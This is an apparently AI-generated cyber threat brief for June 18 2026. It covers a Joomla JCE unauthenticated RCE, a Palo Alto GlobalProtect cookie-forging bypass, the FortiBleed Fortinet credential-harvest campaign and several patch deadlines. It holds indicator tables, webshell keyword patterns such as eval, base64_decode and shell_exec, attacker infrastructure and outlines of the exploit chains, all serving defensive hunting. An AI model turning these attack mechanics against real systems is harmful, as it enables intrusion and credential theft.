Cyber Threat Brief — June 18 2026
⚠️ This report is AI-generated. Always validate findings.
1. Joomla JCE Unauthenticated RCE — CVE-2026-48907
TL;DR: CVSS 10.0 unauthenticated RCE in Joomla Content Editor (JCE) via chained profile import flaws. CISA KEV added June 16; active exploitation confirmed. Patch to 2.9.99.5+.
What’s New:
- Chained design failure: missing authorization on profile import + insufficient file validation + disabled upload safety controls = unauthenticated PHP upload and execution
- YesWeHack published full technical writeup and PoC (ywh-jfellus/CVE-2026-48907)
- Affects JCE 1.0.0 through 2.9.99.4; fixed in 2.9.99.5 (June 3)
- CISA KEV added June 16, federal deadline July 7 under BOD 26-04
- Post-exploitation: rogue editor profiles with machine-generated names, large negative ordering values, and PHP in allowed filetypes
Actionable Intel
| Artifact | Type | ATT&CK | Log Source | Action |
|---|---|---|---|---|
| Rogue JCE editor profiles (negative ordering, php in filetypes) | Persistence indicator | T1505.003 | Joomla DB / admin panel | Audit JCE profiles for unknown entries |
PHP files in tmp/, media/, images/ dirs | Webshell | T1505.003 | File integrity monitoring | Alert on .php creation in media directories |
Hidden .xml.php files in Joomla dirs | Webshell | T1036.005 | FIM / endpoint | Hunt for double-extension PHP files |
| Unauthenticated POST to JCE profile/upload endpoints | Initial access | T1190 | WAF / access logs | Block unauthenticated profile import requests |
eval, base64_decode, shell_exec in uploaded files | Payload indicators | T1059.004 | YARA / FIM | Scan webroot for obfuscated PHP |
Detection
| Source | Rule | Gap |
|---|---|---|
| Splunk ESCU | Web Shell Indicator (generic) | No JCE-specific rule; need profile import endpoint monitoring |
| Elastic | Webshell Detection via File Creation (generic) | No Joomla JCE-specific detection |
| Sigma | webshell_detection_file_creation.yml (generic) | Needs JCE profile import URI pattern |
Sources: YesWeHack writeup · CISA KEV · THN · BleepingComputer
2. Palo Alto GlobalProtect Auth Bypass — CVE-2026-0257
TL;DR: CVSS 7.8 authentication bypass lets unauthenticated attackers forge GlobalProtect VPN cookies and establish unauthorized VPN sessions. Actively exploited since May 17. CISA KEV deadline TOMORROW June 19.
What’s New:
- Authentication override cookies encrypted with the portal/gateway HTTPS certificate; attacker extracts public key and forges valid auth cookies
- Unit42 confirmed two exploitation waves: May 17 and May 21, with continued activity through June
- Rapid7, Arctic Wolf both independently confirmed active exploitation and increasing scan volume
- Affects PAN-OS firewalls with GlobalProtect portal/gateway + authentication override cookies enabled + shared certificate configuration
- Panorama and Cloud NGFW not affected
Actionable Intel
| Artifact | Type | ATT&CK | Log Source | Action |
|---|---|---|---|---|
Anomalous POST to /global-protect/portal/login.esp with long saml-response | Exploitation | T1190 | PAN-OS traffic logs | Alert on oversized saml-response parameters |
Files matching gb_sess_*.txt in /opt/pancfg/session/ | Post-exploitation | T1078 | PAN-OS filesystem | Hunt for unexpected session files |
| Outbound WebSocket on 443/8443 from firewall | C2 | T1071.001 | PAN-OS traffic logs | Alert on firewall-initiated WebSocket connections |
| New local admin accounts on firewall | Persistence | T1136.001 | PAN-OS config audit | Baseline and alert on admin account creation |
| Sessions with empty domain + Win10 Pro 64-bit client config | Exploitation indicator | T1078 | GlobalProtect logs | Hunt for sessions with this fingerprint |
Detection
| Source | Rule | Gap |
|---|---|---|
| Splunk ESCU | None | No GlobalProtect auth bypass detection; need PAN-OS syslog correlation for cookie anomalies |
| Elastic | None | No PAN-OS GlobalProtect-specific detection |
| Sigma | None | No coverage; need rule for GlobalProtect session anomalies via syslog |
Sources: Palo Alto advisory · Unit42 threat brief · Rapid7 · Arctic Wolf
3. FortiBleed — 73K+ Fortinet Firewalls Credential Harvest
TL;DR: Automated credential-harvesting campaign compromised 73,932 Fortinet firewall URLs across 194 countries. Verified working admin credentials dumped publicly June 16-17. Affected orgs include Accenture, Samsung, Siemens, Oracle. Treat as confirmed breach if in dataset.
What’s New:
- Attackers used automated scanning from centralized infrastructure (3xK GmbH, Germany) with curated password lists
- Compromised devices used as listening posts to intercept SSL VPN auth hashes, cracked on 45-GPU Hashtopolis cluster
- Russian-speaking operators; victim list heavily concentrated in NATO countries
- SOCRadar released free FortiBleed Exposure Checker for IP/domain lookup
- Not a single CVE exploit — credential stuffing + hash cracking at scale against weak/reused passwords
- 21,632 unique affected domains confirmed
Actionable Intel
| Artifact | Type | ATT&CK | Log Source | Action |
|---|---|---|---|---|
| Infrastructure: 3xK GmbH (AS212317) source IPs | Scanner infrastructure | T1595.002 | Firewall logs | Block/alert on connections from AS212317 |
| Atypical browser User-Agent strings on VPN portal | Scanning indicator | T1595.002 | FortiGate access logs | Hunt for non-standard UA strings on admin/VPN login |
| Uniform username-password probe patterns | Brute force | T1110.001 | FortiGate auth logs | Alert on credential stuffing patterns |
| Admin account creation post-compromise | Persistence | T1136.001 | FortiGate event logs | Audit and baseline admin accounts |
| SSL VPN session from unexpected geolocations | Unauthorized access | T1078.001 | FortiGate VPN logs | Correlate VPN sessions against expected geo |
Detection
| Source | Rule | Gap |
|---|---|---|
| Splunk ESCU | None | No Fortinet credential-stuffing detection; need FortiGate syslog brute-force correlation |
| Elastic | None | No FortiGate-specific brute-force or credential-leak detection |
| Sigma | None | No coverage for FortiGate VPN credential harvesting patterns |
Sources: Arctic Wolf · BleepingComputer · SOCRadar · TechCrunch
Status Updates
- CVE-2026-47281 / CVE-2026-50656 (RoguePlanet — Windows Defender): Microsoft officially assigned CVE-2026-50656 (CVSS 7.8) on June 16 and confirmed working on a patch. Still UNPATCHED zero-day. PoC public. Defender definition 1.453.20.0 detects PoC binary but does not fix root cause. Detection: alert on interactive SYSTEM shell with MsMpEng.exe parent. SecurityWeek · BleepingComputer
- CVE-2026-54420 (LiteSpeed cPanel Plugin): CISA KEV federal deadline TODAY June 18. Privilege escalation via symlink abuse on shared hosting. Patch to cPanel plugin v2.4.8. THN
- CVE-2026-28318 (SolarWinds Serv-U): CISA KEV federal deadline TOMORROW June 19. DoS via deflate POST. Patch to 15.5.4 Hotfix 1. Original brief